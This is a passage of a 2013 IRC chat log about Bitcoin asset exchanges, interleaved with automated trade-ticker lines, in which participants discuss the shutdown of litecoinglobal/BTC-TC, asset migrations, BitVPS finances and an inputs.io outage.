0.3002 BTC [+] {2} Sep 23 20:00:44 and the servers? and the owner? Sep 23 20:01:07 servers are easy Sep 23 20:01:07 US Sep 23 20:01:10 owners less so Sep 23 20:01:16 both in US Sep 23 20:01:31 I mean, you can move servers where you want Sep 23 20:01:40 [BTCTC] [LABCOIN] 1725 @ 0.00149499 = 2.5789 BTC [-] {3} Sep 23 20:01:40 [BTCTC] [FN] [BTC-GROWTH] 67 @ 0.07504 = 5.0277 BTC [-] Sep 23 20:01:45 last we spoke, he hadnt moved em though Sep 23 20:02:00 no idea about now Sep 23 20:02:36 Should litecoinglobal.com operate at a loss for more than 30 days, burnside reserves the option to liquidate and distribute the proceeds. Sep 23 20:02:38 The likely assets would be: Sep 23 20:02:41 [HAVELOCK] [CBTC] 325 @ 0.00036501 = 0.1186 BTC [-] {3} Sep 23 20:02:41 - the domain litecoinglobal.com. Sep 23 20:02:44 - the website code. Sep 23 20:02:46 - the customer list. Sep 23 20:02:49 - anything left in the site wallet. Sep 23 20:03:00 maybe you can hope to profit on bitcoins left on wallets! Sep 23 20:03:40 and sell e-mails to spammers Sep 23 20:03:42 [BTCTC] [ACTIVEMINING] 1200 @ 0.0015124 = 1.8149 BTC [-] {2} Sep 23 20:03:53 lol Sep 23 20:04:43 [BTCTC] [LABCOIN] 280 @ 0.00149428 = 0.4184 BTC [-] {2} Sep 23 20:05:44 [BTCTC] [LABCOIN] 1845 @ 0.00149844 = 2.7646 BTC [+] {3} Sep 23 20:05:44 [HAVELOCK] [CBTC] 681 @ 0.00036501 = 0.2486 BTC [-] Sep 23 20:06:32 So was this whole thing due to the SEC , or burnside's lawyers saying the SEC would eventually come down on him? Sep 23 20:06:32 anyone know why its shutting down? Sep 23 20:06:45 [BTCTC] [LABCOIN] 1150 @ 0.001499 = 1.7239 BTC [+] Sep 23 20:06:46 yea some one answer the20year1 :) Sep 23 20:07:46 [BTCTC] [ASICMINER-PT] 1 @ 1.397 BTC [+] Sep 23 20:07:46 [BTCTC] [LABCOIN] 1000 @ 0.001497 = 1.497 BTC [-] Sep 23 20:07:56 is burnside a real life MM/Exchange guy? Sep 23 20:08:47 [BTCTC] [ASICMINER-PT] 1 @ 1.397 BTC [+] Sep 23 20:09:48 [BTCTC] [LABCOIN] 785 @ 0.00149465 = 1.1733 BTC [-] {2} Sep 23 20:09:48 [HAVELOCK] [AM100] 600 @ 0.01501972 = 9.0118 BTC [-] {8} Sep 23 20:09:49 [BTCTC] [COGNITIVE] 1 @ 0.1639 BTC [+] Sep 23 20:10:49 [BTCTC] [ACTIVEMINING] 200 @ 0.001613 = 0.3226 BTC [+] Sep 23 20:11:50 [BTCTC] [LABCOIN] 1080 @ 0.00149876 = 1.6187 BTC [+] {4} Sep 23 20:12:52 [BTCTC] [BASIC-MINING] 29 @ 0.07781034 = 2.2565 BTC [+] {4} Sep 23 20:15:54 [BTCTC] [LABCOIN] 1000 @ 0.00141272 = 1.4127 BTC [-] {4} Sep 23 20:16:55 [BTCTC] [LABCOIN] 1500 @ 0.00140046 = 2.1007 BTC [-] {4} Sep 23 20:18:57 [BTCTC] [CIPHERMINE-PT] 100 @ 0.02064 = 2.064 BTC [+] {2} Sep 23 20:18:58 [BTCTC] [BASIC-MINING] 18 @ 0.08 = 1.44 BTC [+] Sep 23 20:19:59 [BTCTC] [ACTIVEMINING] 2510 @ 0.00161536 = 4.0546 BTC [+] {6} Sep 23 20:19:59 [BTCTC] [LABCOIN] 1000 @ 0.001421 = 1.421 BTC [+] Sep 23 20:20:59 [BTCTC] [BASIC-MINING] 21 @ 0.08 = 1.68 BTC [+] Sep 23 20:22:01 [BTCTC] [COGNITIVE] 10 @ 0.12106 = 1.2106 BTC [-] {4} Sep 23 20:23:02 [BTCTC] [ASICMINER-PT] 8 @ 1.39675 = 11.174 BTC [-] {2} Sep 23 20:23:34 ;;echo dexX7 Sep 23 20:23:34 dexX7 Sep 23 20:24:03 [BTCTC] [COGNITIVE] 3 @ 0.121 = 0.363 BTC [-] Sep 23 20:24:03 [BTCTC] [ASICMINER-PT] 1 @ 1.38 BTC [-] Sep 23 20:25:57 ;;echo ;;echo dexx7 Sep 23 20:25:58 ;;echo dexx7 Sep 23 20:26:07 shht Sep 23 20:26:10 lol it doesn't answer to itself Sep 23 20:26:17 i set up a sound notification :) Sep 23 20:26:43 oops lol. sorry. Sep 23 20:26:47 haha no, it's fine Sep 23 20:27:06 [BTCTC] [ASICMINER-PT] 2 @ 1.397 = 2.794 BTC [+] Sep 23 20:28:06 [BTCTC] [LABCOIN] 852 @ 0.00142186 = 1.2114 BTC [+] {3} Sep 23 20:28:06 [BTCTC] [ASICMINER-PT] 3 @ 1.397 = 4.191 BTC [+] Sep 23 20:29:07 [BTCTC] [LABCOIN] 4148 @ 0.00142 = 5.8902 BTC [-] Sep 23 20:30:08 [BTCTC] [COGNITIVE] 15 @ 0.16254666 = 2.4382 BTC [+] {2} Sep 23 20:30:08 [BTCTC] [LABCOIN] 1280 @ 0.00140083 = 1.7931 BTC [-] {6} Sep 23 20:30:08 [BTCTC] [ASICMINER-PT] 10 @ 1.35279999 = 13.528 BTC [-] {5} Sep 23 20:31:09 [BTCTC] [LABCOIN] 645 @ 0.00133091 = 0.8584 BTC [-] {4} Sep 23 20:31:10 [BTCTC] [ASICMINER-PT] 20 @ 1.32614999 = 26.523 BTC [-] {6} Sep 23 20:32:10 [HAVELOCK] [AM100] 48 @ 0.01500847 = 0.7204 BTC [-] {3} Sep 23 20:32:23 mircea_popescu: why hasn't betting close on there will be blood Sep 23 20:32:29 closed* Sep 23 20:32:36 will new bets be accepted? Sep 23 20:32:43 nah. Sep 23 20:33:01 so all bets after the announcement will be voided? Sep 23 20:33:10 refunded yeah. Sep 23 20:33:11 [HAVELOCK] [HIM] 16 @ 0.12800625 = 2.0481 BTC [-] {2} Sep 23 20:33:29 ;;seen jurov Sep 23 20:33:30 jurov was last seen in #bitcoin-assets 2 hours, 25 minutes, and 41 seconds ago: no you didn't want to be on mpex in first place.. don't bs us Sep 23 20:33:46 lol this looks like a job for logs Sep 23 20:34:48 Oh god poor BITVPS Sep 23 20:34:50 wait wut ? Sep 23 20:35:02 BITVPS was originally on mpex Sep 23 20:35:06 wheres namworld when you need him :/ Sep 23 20:35:09 contract was breached, you delisted Sep 23 20:35:13 [BTCTC] [ASICMINER-PT] 1 @ 1.35 BTC [+] Sep 23 20:35:28 i feel for you arij Sep 23 20:35:36 i cry every time Sep 23 20:35:42 lol Sep 23 20:35:54 The requested URL /‎ was not found on this server. Sep 23 20:35:57 that's cute. Sep 23 20:36:21 maybe mircea_popescu will let you relist Sep 23 20:36:32 there's always bitfunder (oldmenlaughing.jpeg) Sep 23 20:36:37 ;;google old men laughing meme Sep 23 20:36:38 Rich Men Laughing | Meme Generator: ; And Then I Said | Know Your Meme: ; Immature High Schoolers | Know Your Meme: Sep 23 20:36:40 haha Sep 23 20:36:52 rather havelock or mpex if they would have us Sep 23 20:37:10 you know some chinese guy asked me the same thing five minutes ago Sep 23 20:37:29 would that chinese guy be friedcat? Sep 23 20:37:30 jkjk Sep 23 20:37:34 arij do you have an august revenue report published anywhere ? Sep 23 20:37:39 thestringpuller dun think so. Sep 23 20:37:45 let me grab you the link Sep 23 20:37:51 i think august is on bitvps.com Sep 23 20:37:59 its not on bitvps.com anymore Sep 23 20:38:09 we moved the link to btct Sep 23 20:38:19 no reason random customers should see the financials imo Sep 23 20:38:21 http://docs.google.com/spreadsheet/pub?key=0AvwwyRGyc1WgdDFvQWJnZnRZQWJfbk1mNHYtVzhPR0E Sep 23 20:38:23 BitVPS Report Sep 23 20:38:55 who Sep 23 20:38:58 s been doing this, namworld ? Sep 23 20:39:04 that is correct Sep 23 20:39:19 why is the cash reserve so low?? Sep 23 20:40:03 hard to keep a big reserve when you need to constantly expand Sep 23 20:40:24 thestringpuller let people run their business lol. i just wanted to see if it exists. Sep 23 20:41:06 this is basically an0, i guess it works. have namworld say hi maybe we work something out here. Sep 23 20:41:06 where in the world is namworld Sep 23 20:41:06 lol Sep 23 20:41:12 alright, will do Sep 23 20:41:19 [BTCTC] [FN] [BTC-GROWTH] 5 @ 0.07505 = 0.3753 BTC [+] Sep 23 20:41:26 mircea_popescu saves the day Sep 23 20:41:31 buy BITVPS Sep 23 20:42:29 arij: I was just asking about the cash reserve because it seems you keep profit mainly as BTC and utilize fiat for only paying bills. Sep 23 20:43:21 [BTCTC] [ASICMINER-PT] 1 @ 1.325 BTC [-] Sep 23 20:43:28 namworld says dance, and arij dances Sep 23 20:43:32 lolol Sep 23 20:50:28 [HAVELOCK] [AM100] 20 @ 0.01488001 = 0.2976 BTC [-] Sep 23 20:53:31 [HAVELOCK] [AM100] 34 @ 0.01488001 = 0.5059 BTC [-] Sep 23 20:55:33 [HAVELOCK] [CFIG] 10 @ 0.1022 = 1.022 BTC [-] Sep 23 20:56:34 [BTCTC] [ACTIVEMINING] 1109 @ 0.001516 = 1.6812 BTC [+] Sep 23 20:57:35 [BTCTC] [BASIC-MINING] 135 @ 0.08042548 = 10.8574 BTC [+] {4} Sep 23 20:57:36 [BTCTC] [ASICMINER-PT] 1 @ 1.394 BTC [+] Sep 23 20:57:36 [BTCTC] [PETA-MINE] 1 @ 0.5104 BTC [-] Sep 23 20:58:36 [HAVELOCK] [AM100] 51 @ 0.01472724 = 0.7511 BTC [-] {6} Sep 23 21:00:09 Is there any news for the TaT assets and Labcoin? Sep 23 21:00:21 tati is fine Sep 23 21:00:26 did you check the news on my assets? Sep 23 21:00:27 he's working on a transition Sep 23 21:00:33 i posted both in each asset and on the threads Sep 23 21:01:15 ThickAsThieves, Nope sorry, I'll check m now. Just had quick access to IRC. Sep 23 21:01:40 [HAVELOCK] [CBTC] 1219 @ 0.00035003 = 0.4267 BTC [-] {3} Sep 23 21:02:41 [BTCTC] [ASICMINER-PT] 1 @ 1.329 BTC [-] Sep 23 21:03:18 Ugh bitfunder as well Sep 23 21:03:20 noes Sep 23 21:04:55 Ugh bitfunder as well --- ? Sep 23 21:06:52 ThickAsThieves, Good news that you are going to havelock as well, but I just don't understand why everyone is so interested on having stuff on bitfunder. But that just my dislike for BF. Sep 23 21:10:49 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] Sep 23 21:10:49 [BTCTC] [BASIC-MINING] 5 @ 0.0811 = 0.4055 BTC [-] Sep 23 21:11:09 we are giving the shareholder the choice Sep 23 21:11:24 it's not our place to decide which is better Sep 23 21:11:38 probably a toss-up at this point Sep 23 21:11:42 It's K, I'm not judging you, I'm very happy I get to choose Havelock :). Sep 23 21:11:56 they were on both anyway or am i confused ? Sep 23 21:12:03 of course TAT.VM is not listed on Havelock, so these people will have to choose BF Sep 23 21:12:05 jup they are both Sep 23 21:12:17 ThickAsThieves, And Neobee, not sure yet? Sep 23 21:12:28 it's listed on both already Sep 23 21:12:45 ok so I just need to watch for the correct procedure to move? Sep 23 21:12:52 it's imminent Sep 23 21:13:01 Cheers! Sep 23 21:13:17 Anyway anyone know anything about the AsicMiner-PT ran by burnside? Sep 23 21:13:44 "there are several options" Sep 23 21:13:53 they shuold be fine Sep 23 21:13:53 [MPEX] [S.MPOE] 3578 @ 0.00091973 = 3.2908 BTC [+] Sep 23 21:13:53 [HAVELOCK] [CBTC] 12000 @ 0.0003501 = 4.2012 BTC [+] Sep 23 21:14:42 7 Sep 23 21:14:55 i wouldnt worry about the AM-PT much Sep 23 21:15:02 dexX7, what do you mean? AsicMiner-PT isn't going to disappear? so BTC-TC will stay online for the AM-PT? Sep 23 21:15:15 probably get the shares transferred to friedcat Sep 23 21:15:20 if he has them. Sep 23 21:15:23 hehe Sep 23 21:15:28 he does Sep 23 21:15:36 mircea_popescu, that would be the scam of a century :D Sep 23 21:15:48 no.. burnside just said "we have several options", whatever this means Sep 23 21:16:05 i guess this could be export to direct shares, convertion to bf.am etc. Sep 23 21:16:15 or tat.am of course Sep 23 21:16:45 San1ty heh, not really big enough. scam of the week ? Sep 23 21:17:01 mircea_popescu, Lol :). Sep 23 21:17:08 And what about Lacboin? Slacking as always? Sep 23 21:17:31 "we are evaluating all options" Sep 23 21:18:00 that's pretty much what you'll here everywhere Sep 23 21:18:26 bitcoin seriously is like the tech soap opera Sep 23 21:18:40 hehe Sep 23 21:18:40 just when things plateau... bam! Sep 23 21:18:55 right on cue Sep 23 21:19:23 yup ;/ Sep 23 21:19:33 bitcoin history is so condensed Sep 23 21:19:42 i wonder if it's lifespan is too Sep 23 21:19:53 probably... Sep 23 21:19:58 [HAVELOCK] [CBTC] 1500 @ 0.00035 = 0.525 BTC [-] Sep 23 21:20:51 every incident made the underlying system stronger, no? Sep 23 21:21:05 at least i would assume that Sep 23 21:21:28 bitcoin is forever. Sep 23 21:22:00 [HAVELOCK] [B] [XBOND] 301 @ 0.00114 = 0.3431 BTC [-] {2} Sep 23 21:22:01 [HAVELOCK] [VTX] 12 @ 0.50000834 = 6.0001 BTC [-] {3} Sep 23 21:22:59 cant be easy Sep 23 21:24:02 [HAVELOCK] [HIM] 40 @ 0.17909749 = 7.1639 BTC [+] {5} Sep 23 21:26:03 [BTCTC] [DMS.MINING] 1158 @ 0.0014 = 1.6212 BTC [+] Sep 23 21:27:04 [HAVELOCK] [VTX] 1 @ 0.50000001 BTC [-] Sep 23 21:27:05 [BTCTC] [LABCOIN] 392 @ 0.001464 = 0.5739 BTC [-] Sep 23 21:27:53 it's better to burn out, than to fade away ~ Neil Young Sep 23 21:28:05 not that he's following his advice Sep 23 21:28:05 [BTCTC] [LABCOIN] 197 @ 0.001466 = 0.2888 BTC [+] Sep 23 21:29:06 [BTCTC] [COGNITIVE] 2 @ 0.1212 = 0.2424 BTC [-] Sep 23 21:30:07 [BTCTC] [LABCOIN] 201 @ 0.00149277 = 0.3 BTC [+] {4} Sep 23 21:32:09 [BTCTC] [ASICMINER-PT] 1 @ 1.336 BTC [+] Sep 23 21:37:14 [BTCTC] [LABCOIN] 392 @ 0.001482 = 0.5809 BTC [+] Sep 23 21:37:15 [MPEX] [S.BBET] 6500 @ 0.00051153 = 3.3249 BTC [-] {2} Sep 23 21:39:17 [BTCTC] [LABCOIN] 392 @ 0.001481 = 0.5806 BTC [-] Sep 23 21:40:18 [BTCTC] [ACTIVEMINING] 100 @ 0.001665 = 0.1665 BTC [+] Sep 23 21:40:19 https://bitcointalk.org/index.php?topic=248803.msg3218956#msg3218956 that was pretty much my reaction Sep 23 21:40:25 Inputs.io | Instant Payments, Offchain API, Secure Wallet, 171k+ BTC transferred Sep 23 21:40:42 the whole thing is amateur Sep 23 21:41:10 is that tradefortress' thing ? Sep 23 21:41:15 yes Sep 23 21:41:39 well it's a one man show run by a teen iirc. Sep 23 21:41:57 is inputs.io dead Sep 23 21:41:58 ? Sep 23 21:41:59 not doing so bad considering. Sep 23 21:42:01 with dubious security claims, like "we escape stuff" Sep 23 21:42:08 ThickAsThieves nah people pissed off at ssl errors. Sep 23 21:42:14 ah Sep 23 21:42:42 well the guy says "use this ip" in a forum Sep 23 21:42:54 and we're supposed to trust it Sep 23 21:43:07 i cant login Sep 23 21:43:20 it doesnt respond Sep 23 21:43:21 [BTCTC] [ASICMINER-PT] 1 @ 1.335 BTC [-] Sep 23 21:43:22 me neither, it seems the backend is down Sep 23 21:44:17 pankkake so tell him to gpg or stfu. Sep 23 21:44:19 Wait people use that site? Sep 23 21:44:25 mircea_popescu: already did Sep 23 21:44:45 zero transaction fee is appealing Sep 23 21:44:54 MilkyLep he was running a coin lending programme, and some chatroom or w/e, he has some history. Sep 23 21:45:23 [BTCTC] [BASIC-MINING] 6 @ 0.083 = 0.498 BTC [+] Sep 23 21:45:24 [BTCTC] [ACTIVEMINING] 747 @ 0.00165058 = 1.233 BTC [-] {2} Sep 23 21:45:59 About as appealing as a juicy worm looks on the end of a hook to a fish. Sep 23 21:46:06 I know of his history Sep 23 21:46:14 But i gotta poke fun here and there Sep 23 21:46:24 [BTCTC] [ASICMINER-PT] 1 @ 1.359 BTC [+] Sep 23 21:46:24 [BTCTC] [BTC-BOND] 20 @ 0.007135 = 0.1427 BTC [-] Sep 23 21:46:28 all of his things are cool, but lack sufficient transparency for trust Sep 23 21:46:46 exactly Sep 23 21:47:16 well, there's a balance here. he's a kid. kids are stupid by nature, cause that's how people are born : dumb. Sep 23 21:47:25 [BTCTC] [COGNITIVE] 1 @ 0.1212 BTC [-] Sep 23 21:47:25 [BTCTC] [BTC-BOND] 40 @ 0.00713279 = 0.2853 BTC [-] {3} Sep 23 21:47:25 [BTCTC] [CRYPTO-TRADE] 3 @ 0.18 = 0.54 BTC [-] Sep 23 21:47:32 unlike the other kids (garr, say) this one has more or less walked straight. Sep 23 21:47:51 at least so far. Sep 23 21:47:52 He seems very steadfast his decisions to avoid transparency, which is his right. Good ideas though Sep 23 21:47:57 time will tell Sep 23 21:48:26 [BTCTC] [BTC-BOND] 641 @ 0.00530358 = 3.3996 BTC [-] {4} Sep 23 21:48:26 [BTCTC] [LABCOIN] 320 @ 0.001403 = 0.449 BTC [-] Sep 23 21:48:33 transparency is a complicated affair. everyone claims transparency, nobody delivers. Sep 23 21:48:59 point in case, the laughable bitpay "We lost our domains and a ton of btc" scandal. or, outside of btc world, the entire times lost their twitter account. Sep 23 21:49:32 Reactions and responses are what interest me in times like this Sep 23 21:49:40 hell, for that matter the nist is "transparent" Sep 23 21:50:01 https://bitcointalk.org/index.php?topic=134799.msg3219208#msg3219208 Sep 23 21:50:04 BitBet open beta. Sep 23 21:50:28 [BTCTC] [BTC-BOND] 26 @ 0.00422788 = 0.1099 BTC [-] {2} Sep 23 21:51:04 great move Sep 23 21:51:13 I hope the 85 BTC guy is butthurt! Sep 23 21:51:29 [BTCTC] [BTC-BOND] 45 @ 0.00410066 = 0.1845 BTC [-] {2} Sep 23 21:51:29 [MPEX] [S.MPOE] 2281 @ 0.00091973 = 2.0979 BTC [+] Sep 23 21:52:08 im not taking the 1% out of his ass. i wanted to but the OTHER people involved who are actually nice talked me out of it. Sep 23 21:52:17 oh only for new bets? :( Sep 23 21:52:21 yeah. Sep 23 21:52:30 [BTCTC] [CRYPTO-TRADE] 7 @ 0.171 = 1.197 BTC [-] Sep 23 21:52:37 well, it's fair, you shouldn't change the rules retroactively… but not fun Sep 23 21:53:26 yeah. Sep 23 21:53:31 [BTCTC] [BASIC-MINING] 5 @ 0.084 = 0.42 BTC [+] Sep 23 21:53:31 [BTCTC] [LABCOIN] 180 @ 0.00139404 = 0.2509 BTC [-] {3} Sep 23 21:53:31 [BTCTC] [ASICMINER-PT] 3 @ 1.35833333 = 4.075 BTC [-] {2} Sep 23 21:53:45 asicminer at 1.3 ?! Sep 23 21:54:17 you didn't notice? Sep 23 21:54:22 great time actually :) Sep 23 21:54:32 [BTCTC] [ACTIVEMINING] 505 @ 0.001665 = 0.8408 BTC [+] Sep 23 21:54:40 hit 1.0 right after trading restart Sep 23 21:54:46 i wasn't watching it all that close. so basically once the scam is out of the picture, asicminer came back to its actual value Sep 23 21:54:51 and all the rest of the shit is gone. Sep 23 21:54:56 pretty cool in the end, i say. Sep 23 21:55:33 [BTCTC] [COGNITIVE] 5 @ 0.1573 = 0.7865 BTC [+] {2} Sep 23 21:55:33 [BTCTC] [LABCOIN] 392 @ 0.001475 = 0.5782 BTC [+] Sep 23 21:55:33 [BTCTC] [NASTY-PT] 118 @ 0.001444 = 0.1704 BTC [+] {3} Sep 23 21:56:34 [BTCTC] [BASIC-MINING] 2 @ 0.0905 = 0.181 BTC [+] Sep 23 21:57:35 [BTCTC] [BASIC-MINING] 2 @ 0.0904 = 0.1808 BTC [-] Sep 23 21:57:54 "Bitcoinica liquidator wants to hear from users" Sep 23 21:58:04 whoa what a blast from the past. Sep 23 22:02:01 that's the past? Sep 23 22:02:23 where have i been? Sep 23 22:02:39 [MPEX] [S.MPOE] 5527 @ 0.00091973 = 5.0833 BTC [+] Sep 23 22:02:40 [BTCTC] [LABCOIN] 100 @ 0.00139604 = 0.1396 BTC [-] {2} Sep 23 22:02:40 [HAVELOCK] [AM100] 26 @ 0.01430001 = 0.3718 BTC [-] Sep 23 22:02:56 given your username, you're dead Sep 23 22:03:48 oh crap you're right Sep 23 22:04:09 lol Sep 23 22:04:12 do we still have a postal service? Sep 23 22:04:18 hahaha Sep 23 22:04:26 yes, you pay people and they go postal for your amusement. Sep 23 22:05:03 i came in to see mircea's list of bitcoin's current best scamjobs Sep 23 22:05:08 *** BTCT.co migration instructions have been posted in each asset page, emailed to all holders, and posted to each official forum thread *** Sep 23 22:05:11 top 3 pls? Sep 23 22:06:07 *** To clarify, I am referring to TAT Investments issues only *** Sep 23 22:08:46 [BTCTC] [ASICMINER-PT] 1 @ 1.358 BTC [-] Sep 23 22:09:16 despite the postal service accounting for less than 1% of the full-time civilian labor force, 13% of workplace homicides were committed at postal facilities by current or former employees. Sep 23 22:09:46 I wonder if government employees go through some kind of brainwashing Sep 23 22:09:46 lyspooner http://trilema.com/2013/the-anatomy-of-a-scam/ http://trilema.com/2013/the-anatomy-of-another-scam/ Sep 23 22:09:51 apparently anatomy is the keyword. Sep 23 22:10:32 thanks! Sep 23 22:10:48 [HAVELOCK] [VTX] 43 @ 0.5 = 21.5 BTC [-] {3} Sep 23 22:10:49 [HAVELOCK] [HIM] 3 @ 0.17999999 = 0.54 BTC [+] Sep 23 22:10:50 [BTCTC] [LABCOIN] 303 @ 0.001438 = 0.4357 BTC [+] Sep 23 22:11:49 [HAVELOCK] [AM100] 11 @ 0.01430001 = 0.1573 BTC [-] {2} Sep 23 22:11:50 [BTCTC] [BMF] 101 @ 0.02988712 = 3.0186 BTC [+] {3} Sep 23 22:12:54 mpex option volumes seem to be correlated to the volumes on major exchanges. how did you hedge this? i know you are short on everyone already in general because everyone is dumb, but has that helped? Sep 23 22:13:51 [BTCTC] [LABCOIN] 1000 @ 0.00143 = 1.43 BTC [-] Sep 23 22:13:51 [BTCTC] [ASICMINER-PT] 1 @ 1.335 BTC [-] Sep 23 22:14:52 [BTCTC] [ASICMINER-PT] 19 @ 1.3265263 = 25.204 BTC [-] {6} Sep 23 22:15:25 lyspooner the volume is acutally pretty small of late. Sep 23 22:16:54 [BTCTC] [S.MPOE-PT] 144 @ 0.00089909 = 0.1295 BTC [+] {3} Sep 23 22:18:35 mircea_popescu: how much have you spent on marketing in the past 6 months? Sep 23 22:19:26 complex question to answer. is intel marketing ? Sep 23 22:19:34 anyway, as a lower bound, coupla hundred btc. Sep 23 22:19:57 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] Sep 23 22:20:58 [BTCTC] [LABCOIN] 13000 @ 0.00131367 = 17.0777 BTC [-] {17} Sep 23 22:20:58 [BTCTC] [ASICMINER-PT] 1 @ 1.359 BTC [+] Sep 23 22:21:59 [HAVELOCK] [AM100] 8 @ 0.01430001 = 0.1144 BTC [-] Sep 23 22:22:22 it's R&D, no? Sep 23 22:22:25 cool, keep up the good work. hope to see the volumes go up soon. Sep 23 22:22:45 lyspooner seeing the incredible noise dieing mtgox is inducing in the market... i;'d be scared to shit if volumes were up. Sep 23 22:23:10 ThickAsThieves no, i mean intel as in, knowing what everyone is doing. you know, like the btcnsa. Sep 23 22:23:51 Installed your own version of PRISM everywhere then? Sep 23 22:24:01 [BTCTC] [BASIC-MINING] 2 @ 0.0854 = 0.1708 BTC [-] Sep 23 22:25:48 nah, i'm a voluntarist. Sep 23 22:26:11 people generally tell me shit because overall nobody wants btc to go to shit. Sep 23 22:27:04 [BTCTC] [LABCOIN] 328 @ 0.00131095 = 0.43 BTC [-] {2} Sep 23 22:28:05 [BTCTC] [LABCOIN] 480 @ 0.00130104 = 0.6245 BTC [-] {3} Sep 23 22:32:09 [BTCTC] [ASICMINER-PT] 3 @ 1.33 = 3.99 BTC [-] Sep 23 22:33:10 [HAVELOCK] [AM100] 55 @ 0.01430001 = 0.7865 BTC [-] Sep 23 22:34:11 [BTCTC] [ASICMINER-PT] 3 @ 1.325 = 3.975 BTC [-] {2} Sep 23 22:34:23 arij: https://bitcointalk.org/index.php?topic=131922.msg3219472#msg3219472 Sep 23 22:35:08 thanks jurov.. we've been a bit short handed for the past few days. i want on my once-yearly 3 day vacation Sep 23 22:39:16 [BTCTC] [ASICMINER-PT] 3 @ 1.329 = 3.987 BTC [+] {2} Sep 23 22:40:17 [BTCTC] [BTC-BOND] 100 @ 0.005 = 0.5 BTC [+] Sep 23 22:40:18 [BTCTC] [ASICMINER-PT] 2 @ 1.3235 = 2.647 BTC [-] {2} Sep 23 22:41:19 [BTCTC] [ACTIVEMINING] 884 @ 0.001665 = 1.4719 BTC [+] {2} Sep 23 22:41:19 [BTCTC] [ASICMINER-PT] 2 @ 1.329 = 2.658 BTC [+] Sep 23 22:42:03 don't you have to be over 75 years old for that ? Sep 23 22:42:13 lmao wait wait wait A SECOND, Sep 23 22:42:19 [BTCTC] [BASIC-MINING] 10 @ 0.08502 = 0.8502 BTC [-] Sep 23 22:42:19 [BTCTC] [BTC-BOND] 83 @ 0.006 = 0.498 BTC [+] Sep 23 22:42:19 [BTCTC] [ASICMINER-PT] 6 @ 1.32933333 = 7.976 BTC [+] {2} Sep 23 22:42:32 the guy that invented the "buy lotto tickets with pmb "dividends"" idea has something to say on a topic ?! Sep 23 22:43:20 [BTCTC] [ACTIVEMINING] 527 @ 0.0016651 = 0.8775 BTC [+] {2} Sep 23 22:44:21 [BTCTC] [ASICMINER-PT] 1 @ 1.33 BTC [+] Sep 23 22:44:21 [BTCTC] [LABCOIN] 384 @ 0.00131366 = 0.5044 BTC [+] {2} Sep 23 22:44:22 [BTCTC] [BTC-BOND] 200 @ 0.00732999 = 1.466 BTC [+] {3} Sep 23 22:45:22 [BTCTC] [LABCOIN] 116 @ 0.001311 = 0.1521 BTC [-] Sep 23 22:45:22 [BTCTC] [BTC-BOND] 17 @ 0.008 = 0.136 BTC [+] Sep 23 22:45:22 [BTCTC] [ASICMINER-PT] 3 @ 1.358 = 4.074 BTC [+] Sep 23 22:46:23 [BTCTC] [BTC-BOND] 100 @ 0.009 = 0.9 BTC [+] Sep 23 22:53:31 [BTCTC] [ASICMINER-PT] 2 @ 1.324 = 2.648 BTC [-] Sep 23 22:55:32 [BTCTC] [LABCOIN] 121 @ 0.001397 = 0.169 BTC [+] Sep 23 22:55:33 [MPEX] [S.MPOE] 5650 @ 0.00092907 = 5.2492 BTC [+] {2} Sep 23 22:58:36 [HAVELOCK] [NEOBEE] 157 @ 0.003 = 0.471 BTC [+] Sep 23 22:59:37 [BTCTC] [BTC-BOND] 2238 @ 0.00416693 = 9.3256 BTC [-] {8} Sep 23 23:00:38 [BTCTC] [ACTIVEMINING] 600 @ 0.00156977 = 0.9419 BTC [-] {4} Sep 23 23:00:38 [BTCTC] [BASIC-MINING] 9 @ 0.08502 = 0.7652 BTC [-] Sep 23 23:01:38 [BTCTC] [ASICMINER-PT] 10 @ 1.35749999 = 13.575 BTC [+] {5} Sep 23 23:03:41 [BTCTC] [ASICMINER-PT] 1 @ 1.324 BTC [-] Sep 23 23:03:41 [BTCTC] [BTC-BOND] 344 @ 0.00400072 = 1.3762 BTC [-] {2} **** BEGIN LOGGING AT Tue Sep 24 02:37:11 2013 Sep 24 02:43:09 [HAVELOCK] [AM100] 12 @ 0.01519 = 0.1823 BTC [+] Sep 24 02:47:13 [BTCTC] [ACTIVEMINING] 163 @ 0.001576 = 0.2569 BTC [-] Sep 24 02:49:15 [BTCTC] [ACTIVEMINING] 343 @ 0.001543 = 0.5292 BTC [-] {2} Sep 24 02:50:16 [BTCTC] [ACTIVEMINING] 519 @ 0.001543 = 0.8008 BTC [-] {4} Sep 24 02:51:17 [BTCTC] [COGNITIVE] 3 @ 0.135 = 0.405 BTC [+] Sep 24 02:51:17 [BTCTC] [BASIC-MINING] 34 @ 0.08426058 = 2.8649 BTC [+] {4} Sep 24 02:51:17 [BTCTC] [BITVPS] 85 @ 0.0012 = 0.102 BTC [-] Sep 24 02:52:03 bitbet faq updated (new items in sections A and D). Sep 24 02:52:04 http://bitbet.us/faq/ Sep 24 02:52:07 FAQ BitBet Sep 24 02:52:18 [MPEX] [S.MPOE] 17150 @ 0.0009287 = 15.9272 BTC [+] {3} Sep 24 02:52:18 [BTCTC] [BASIC-MINING] 7 @ 0.0751 = 0.5257 BTC [-] Sep 24 02:53:19 [MPEX] [S.MPOE] 15240 @ 0.00093184 = 14.2012 BTC [+] {2} Sep 24 02:53:19 [BTCTC] [BASIC-MINING] 3 @ 0.07501 = 0.225 BTC [-] Sep 24 02:56:22 [BTCTC] [CRYPTO-TRADE] 23 @ 0.15217391 = 3.5 BTC [-] {4} Sep 24 03:00:26 [BTCTC] [PETA-MINE] 2 @ 0.6599 = 1.3198 BTC [+] {2} Sep 24 03:11:36 [MPEX] [S.MPOE] 4390 @ 0.00093246 = 4.0935 BTC [+] Sep 24 03:14:39 [MPEX] [S.MPOE] 5520 @ 0.00092201 = 5.0895 BTC [-] Sep 24 03:16:41 [HAVELOCK] [HIM] 1 @ 0.17999999 BTC [+] Sep 24 03:18:23 mircea_popescu: flush please Sep 24 03:20:46 [MPEX] [S.MPOE] 10823 @ 0.00091207 = 9.8713 BTC [-] {2} Sep 24 03:21:47 [MPEX] [S.MPOE] 2677 @ 0.00091177 = 2.4408 BTC [-] Sep 24 03:28:23 thanks Sep 24 03:28:54 [BTCTC] [BTC-BOND] 100 @ 0.009 = 0.9 BTC [-] Sep 24 03:28:54 [BTCTC] [FN] [BTC-GROWTH] 406 @ 0.07504 = 30.4662 BTC [-] Sep 24 03:29:55 [BTCTC] [FN] [BTC-GROWTH] 835 @ 0.05532704 = 46.1981 BTC [-] {8} Sep 24 03:30:03 lol cool. Sep 24 03:30:56 [BTCTC] 